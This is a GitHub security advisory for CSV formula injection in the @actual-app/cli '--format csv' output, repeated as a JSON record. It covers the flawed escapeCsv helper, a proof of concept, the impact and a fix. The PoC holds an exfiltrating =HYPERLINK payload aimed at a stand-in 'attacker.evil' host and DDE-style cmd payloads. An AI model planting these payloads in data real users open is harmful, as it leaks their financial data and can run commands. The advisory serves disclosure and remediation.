GHSA-7GH7-258J-4MPQ
Vulnerability from github – Published: 2026-06-22 21:42 – Updated: 2026-06-22 21:42Summary
@actual-app/cli ships a hand-rolled CSV serializer in packages/cli/src/output.ts (used whenever the global --format csv option is passed) whose escapeCsv helper only handles RFC 4180 delimiter/quote/newline escaping. It does not neutralize the standard CSV formula-injection prefixes (=, +, -, @, \t, \r). Any CLI command that streams an object array containing user-controlled strings — transactions list, accounts list, payees list, categories list, tags list, category-groups list, rules list, schedules list, query — will emit cells that auto-evaluate when the resulting CSV is opened in Excel, LibreOffice Calc, or Google Sheets, enabling data exfiltration (=HYPERLINK(...), =WEBSERVICE(...)) and arbitrary formula execution.
This is a distinct variant of the formula-injection surface in packages/loot-core/src/server/transactions/export/export-to-csv.ts (which uses csv-stringify and would need a separate cast option fix) — they are different files, different packages, and different serializers. Fixing one does not fix the other.
Details
Vulnerable code
packages/cli/src/output.ts:98-103:
function escapeCsv(value: string): string {
if (value.includes(',') || value.includes('"') || value.includes('\n')) {
return '"' + value.replace(/"/g, '""') + '"';
}
return value;
}
The helper performs only delimiter/quote/newline neutralization, which is sufficient for RFC 4180 parsing but irrelevant to spreadsheet formula evaluation. CSV double-quoting is invisible to Excel/Calc/Sheets — the unquoted cell value =HYPERLINK("http://attacker/?d="&B2,"Click") is still parsed as a formula by the spreadsheet, even when wrapped as "=HYPERLINK(""http://attacker/?d=""&B2,""Click"")" on disk.
Data flow to the sink
- The global
--formatoption is registered atpackages/cli/src/index.ts:53-57withchoices(['json','table','csv'])and applies to every subcommand. - List/query subcommands invoke
printOutput(data, format)(output.ts:105-107), which routesformat === 'csv'toformatCsv(output.ts:71-96). - For each row, every column is run through
formatCellValue(output.ts:21-26):ts function formatCellValue(key: string, value: unknown): string { if (isAmountValue(key, value)) { return (value / 100).toFixed(2); } return String(value ?? ''); }Only the fixedAMOUNT_FIELDSset (amount,balance,budgeted, etc.) gets numeric coercion. User-controlled string fields —payee.name,account.name,category.name,notes, tag names, rule descriptions, schedule names — are passed verbatim toescapeCsv. escapeCsvreturns the value unmodified unless it contains,,", or\n. A payload such as=1+1,@SUM(...),+1+cmd|'/c calc'!A0, or-2+3+cmd|'/c calc'!A0therefore lands in the output as a leading-character formula.
Exploitability conditions
- The CLI is installed and used by the victim (
@actual-app/cliis published with"bin": { "actual": "./dist/cli.js", "actual-cli": "./dist/cli.js" }). - The attacker can persist a malicious string in any user-controlled field of the budget. Realistic vectors:
- Co-user / co-collaborator of a synced budget (multi-device, or attacker-controlled sync server).
- Sending the victim a crafted OFX/QIF/CSV import file.
- API write access (e.g., over a compromised sync session).
- The victim runs
actual <list-cmd> --format csv > out.csvand opensout.csvin a spreadsheet program. CSV files generated locally by the CLI are not gated by Office Protected View / Mark-of-the-Web, so formulas evaluate immediately.
There are no mitigations in the code path: no allowlist, no sanitizer, no cast option, no warning, and the CLI is shipped to end users via npm.
PoC
Setup (one-time — choose any user-controlled field; payee shown):
# Inject via the CLI's own write path (or via OFX/QIF/CSV import, or shared sync):
actual transactions add \
--account "$ACCOUNT_ID" \
--data '[{"payee_name":"=HYPERLINK(\"http://attacker.evil/leak?d=\"&B2,\"Bank refund\")","date":"2026-01-01","amount":10000}]'
Trigger (victim runs):
actual transactions list --account "$ACCOUNT_ID" --start 2026-01-01 --end 2026-12-31 --format csv > out.csv
cat out.csv
Observed output (abridged; quoting is RFC 4180-correct but the formula prefix is preserved):
id,date,amount,payee,notes,category,account,cleared,reconciled
abc...,2026-01-01,100.00,"=HYPERLINK(""http://attacker.evil/leak?d=""&B2,""Bank refund"")",,,Checking,false,false
Open out.csv in Excel / LibreOffice Calc / Google Sheets → the payee cell renders as a clickable hyperlink that, when clicked (or auto-fetched in some configurations), exfiltrates neighboring cell content (B2 = the date, but trivially adjustable to any cell) to the attacker.
Minimal-payload variants that bypass escapeCsv entirely (no ,, ", or \n → no quoting at all):
- Payee name
=1+1→ cell shows2. - Payee name
@SUM(1+1)→ cell shows2. - Payee name
+1+1→ cell shows2. - Payee name
-2+3→ cell shows1.
The same applies to other list commands sharing the global --format option:
actual accounts list --format csv # account.name
actual payees list --format csv # payee.name
actual categories list --format csv # category.name
actual tags list --format csv
actual category-groups list --format csv
actual rules list --format csv
actual schedules list --format csv
actual query "..." --format csv
Verified by reading escapeCsv (packages/cli/src/output.ts:98-103): the only escape triggers are ,, ", \n, and even when triggered the leading character is preserved.
Impact
- Data exfiltration in the victim's spreadsheet context via
=HYPERLINK(...),=WEBSERVICE(...),=IMPORTXML(...)(Sheets),=IMPORTDATA(...)(Sheets) — typically one click for HYPERLINK, fully automatic for WEBSERVICE/IMPORT* on confirmation. Victim's financial data (account names, balances, transactions in adjacent cells) is the natural exfil target. - Arbitrary formula execution in the victim's spreadsheet context, including legacy DDE-style payloads on outdated Excel installations (potential RCE).
- Trust-boundary crossing: financial data the victim assumes is "exported" becomes attacker-controlled active content. The CLI is the victim's own trusted tool; users do not expect
actual transactions list --format csvto produce a file that runs code.
Blast radius is bounded by the requirement that the attacker plant a string in a user-controlled field and the victim opens the CSV in a spreadsheet — but both are realistic for a personal-finance app whose primary export workflow is "open in Excel".
Recommended Fix
Neutralize formula-trigger prefixes in escapeCsv before the existing RFC 4180 quoting. Example:
// packages/cli/src/output.ts
const FORMULA_TRIGGERS = /^[=+\-@\t\r]/;
function escapeCsv(value: string): string {
// Neutralize spreadsheet formula prefixes (CWE-1236).
if (FORMULA_TRIGGERS.test(value)) {
value = "'" + value;
}
if (value.includes(',') || value.includes('"') || value.includes('\n')) {
return '"' + value.replace(/"/g, '""') + '"';
}
return value;
}
The leading single-quote is the OWASP-recommended neutralizer: it is stripped by Excel/Calc on display but prevents formula evaluation. Apply the same fix in packages/loot-core/src/server/transactions/export/export-to-csv.ts by passing a cast option to csv-stringify that prepends ' to any string starting with a formula trigger — the two sites are independent and both must be patched.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@actual-app/cli"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46672"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:42:15Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\n`@actual-app/cli` ships a hand-rolled CSV serializer in `packages/cli/src/output.ts` (used whenever the global `--format csv` option is passed) whose `escapeCsv` helper only handles RFC 4180 delimiter/quote/newline escaping. It does **not** neutralize the standard CSV formula-injection prefixes (`=`, `+`, `-`, `@`, `\\t`, `\\r`). Any CLI command that streams an object array containing user-controlled strings \u2014 `transactions list`, `accounts list`, `payees list`, `categories list`, `tags list`, `category-groups list`, `rules list`, `schedules list`, `query` \u2014 will emit cells that auto-evaluate when the resulting CSV is opened in Excel, LibreOffice Calc, or Google Sheets, enabling data exfiltration (`=HYPERLINK(...)`, `=WEBSERVICE(...)`) and arbitrary formula execution.\n\nThis is a **distinct variant** of the formula-injection surface in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` (which uses `csv-stringify` and would need a separate `cast` option fix) \u2014 they are different files, different packages, and different serializers. Fixing one does not fix the other.\n\n## Details\n\n### Vulnerable code\n\n`packages/cli/src/output.ts:98-103`:\n\n```ts\nfunction escapeCsv(value: string): string {\n if (value.includes(\u0027,\u0027) || value.includes(\u0027\"\u0027) || value.includes(\u0027\\n\u0027)) {\n return \u0027\"\u0027 + value.replace(/\"/g, \u0027\"\"\u0027) + \u0027\"\u0027;\n }\n return value;\n}\n```\n\nThe helper performs only delimiter/quote/newline neutralization, which is sufficient for RFC 4180 *parsing* but irrelevant to spreadsheet *formula evaluation*. CSV double-quoting is invisible to Excel/Calc/Sheets \u2014 the unquoted cell value `=HYPERLINK(\"http://attacker/?d=\"\u0026B2,\"Click\")` is still parsed as a formula by the spreadsheet, even when wrapped as `\"=HYPERLINK(\"\"http://attacker/?d=\"\"\u0026B2,\"\"Click\"\")\"` on disk.\n\n### Data flow to the sink\n\n1. The global `--format` option is registered at `packages/cli/src/index.ts:53-57` with `choices([\u0027json\u0027,\u0027table\u0027,\u0027csv\u0027])` and applies to every subcommand.\n2. List/query subcommands invoke `printOutput(data, format)` (`output.ts:105-107`), which routes `format === \u0027csv\u0027` to `formatCsv` (`output.ts:71-96`).\n3. For each row, every column is run through `formatCellValue` (`output.ts:21-26`):\n ```ts\n function formatCellValue(key: string, value: unknown): string {\n if (isAmountValue(key, value)) {\n return (value / 100).toFixed(2);\n }\n return String(value ?? \u0027\u0027);\n }\n ```\n Only the fixed `AMOUNT_FIELDS` set (`amount`, `balance`, `budgeted`, etc.) gets numeric coercion. User-controlled string fields \u2014 `payee.name`, `account.name`, `category.name`, `notes`, tag names, rule descriptions, schedule names \u2014 are passed verbatim to `escapeCsv`.\n4. `escapeCsv` returns the value unmodified unless it contains `,`, `\"`, or `\\n`. A payload such as `=1+1`, `@SUM(...)`, `+1+cmd|\u0027/c calc\u0027!A0`, or `-2+3+cmd|\u0027/c calc\u0027!A0` therefore lands in the output as a leading-character formula.\n\n### Exploitability conditions\n\n- The CLI is installed and used by the victim (`@actual-app/cli` is published with `\"bin\": { \"actual\": \"./dist/cli.js\", \"actual-cli\": \"./dist/cli.js\" }`).\n- The attacker can persist a malicious string in any user-controlled field of the budget. Realistic vectors:\n - Co-user / co-collaborator of a synced budget (multi-device, or attacker-controlled sync server).\n - Sending the victim a crafted OFX/QIF/CSV import file.\n - API write access (e.g., over a compromised sync session).\n- The victim runs `actual \u003clist-cmd\u003e --format csv \u003e out.csv` and opens `out.csv` in a spreadsheet program. CSV files generated locally by the CLI are not gated by Office Protected View / Mark-of-the-Web, so formulas evaluate immediately.\n\nThere are **no mitigations** in the code path: no allowlist, no sanitizer, no `cast` option, no warning, and the CLI is shipped to end users via npm.\n\n## PoC\n\nSetup (one-time \u2014 choose any user-controlled field; payee shown):\n\n```bash\n# Inject via the CLI\u0027s own write path (or via OFX/QIF/CSV import, or shared sync):\nactual transactions add \\\n --account \"$ACCOUNT_ID\" \\\n --data \u0027[{\"payee_name\":\"=HYPERLINK(\\\"http://attacker.evil/leak?d=\\\"\u0026B2,\\\"Bank refund\\\")\",\"date\":\"2026-01-01\",\"amount\":10000}]\u0027\n```\n\nTrigger (victim runs):\n\n```bash\nactual transactions list --account \"$ACCOUNT_ID\" --start 2026-01-01 --end 2026-12-31 --format csv \u003e out.csv\ncat out.csv\n```\n\nObserved output (abridged; quoting is RFC 4180-correct but the formula prefix is preserved):\n\n```\nid,date,amount,payee,notes,category,account,cleared,reconciled\nabc...,2026-01-01,100.00,\"=HYPERLINK(\"\"http://attacker.evil/leak?d=\"\"\u0026B2,\"\"Bank refund\"\")\",,,Checking,false,false\n```\n\nOpen `out.csv` in Excel / LibreOffice Calc / Google Sheets \u2192 the `payee` cell renders as a clickable hyperlink that, when clicked (or auto-fetched in some configurations), exfiltrates neighboring cell content (`B2` = the date, but trivially adjustable to any cell) to the attacker.\n\nMinimal-payload variants that bypass `escapeCsv` entirely (no `,`, `\"`, or `\\n` \u2192 no quoting at all):\n\n- Payee name `=1+1` \u2192 cell shows `2`.\n- Payee name `@SUM(1+1)` \u2192 cell shows `2`.\n- Payee name `+1+1` \u2192 cell shows `2`.\n- Payee name `-2+3` \u2192 cell shows `1`.\n\nThe same applies to other list commands sharing the global `--format` option:\n\n```bash\nactual accounts list --format csv # account.name\nactual payees list --format csv # payee.name\nactual categories list --format csv # category.name\nactual tags list --format csv\nactual category-groups list --format csv\nactual rules list --format csv\nactual schedules list --format csv\nactual query \"...\" --format csv\n```\n\nVerified by reading `escapeCsv` (`packages/cli/src/output.ts:98-103`): the only escape triggers are `,`, `\"`, `\\n`, and even when triggered the leading character is preserved.\n\n## Impact\n\n- **Data exfiltration** in the victim\u0027s spreadsheet context via `=HYPERLINK(...)`, `=WEBSERVICE(...)`, `=IMPORTXML(...)` (Sheets), `=IMPORTDATA(...)` (Sheets) \u2014 typically one click for HYPERLINK, fully automatic for WEBSERVICE/IMPORT* on confirmation. Victim\u0027s financial data (account names, balances, transactions in adjacent cells) is the natural exfil target.\n- **Arbitrary formula execution** in the victim\u0027s spreadsheet context, including legacy DDE-style payloads on outdated Excel installations (potential RCE).\n- **Trust-boundary crossing**: financial data the victim assumes is \"exported\" becomes attacker-controlled active content. The CLI is the victim\u0027s own trusted tool; users do not expect `actual transactions list --format csv` to produce a file that runs code.\n\nBlast radius is bounded by the requirement that the attacker plant a string in a user-controlled field and the victim opens the CSV in a spreadsheet \u2014 but both are realistic for a personal-finance app whose primary export workflow is \"open in Excel\".\n\n## Recommended Fix\n\nNeutralize formula-trigger prefixes in `escapeCsv` *before* the existing RFC 4180 quoting. Example:\n\n```ts\n// packages/cli/src/output.ts\nconst FORMULA_TRIGGERS = /^[=+\\-@\\t\\r]/;\n\nfunction escapeCsv(value: string): string {\n // Neutralize spreadsheet formula prefixes (CWE-1236).\n if (FORMULA_TRIGGERS.test(value)) {\n value = \"\u0027\" + value;\n }\n if (value.includes(\u0027,\u0027) || value.includes(\u0027\"\u0027) || value.includes(\u0027\\n\u0027)) {\n return \u0027\"\u0027 + value.replace(/\"/g, \u0027\"\"\u0027) + \u0027\"\u0027;\n }\n return value;\n}\n```\n\nThe leading single-quote is the OWASP-recommended neutralizer: it is stripped by Excel/Calc on display but prevents formula evaluation. Apply the same fix in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` by passing a `cast` option to `csv-stringify` that prepends `\u0027` to any string starting with a formula trigger \u2014 the two sites are independent and both must be patched.",
"id": "GHSA-7gh7-258j-4mpq",
"modified": "2026-06-22T21:42:15Z",
"published": "2026-06-22T21:42:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/actualbudget/actual/security/advisories/GHSA-7gh7-258j-4mpq"
},
{
"type": "PACKAGE",
"url": "https://github.com/actualbudget/actual"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "@actual-app/cli `--format csv` Output Vulnerable to CSV Formula Injection via Custom `escapeCsv` Helper"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.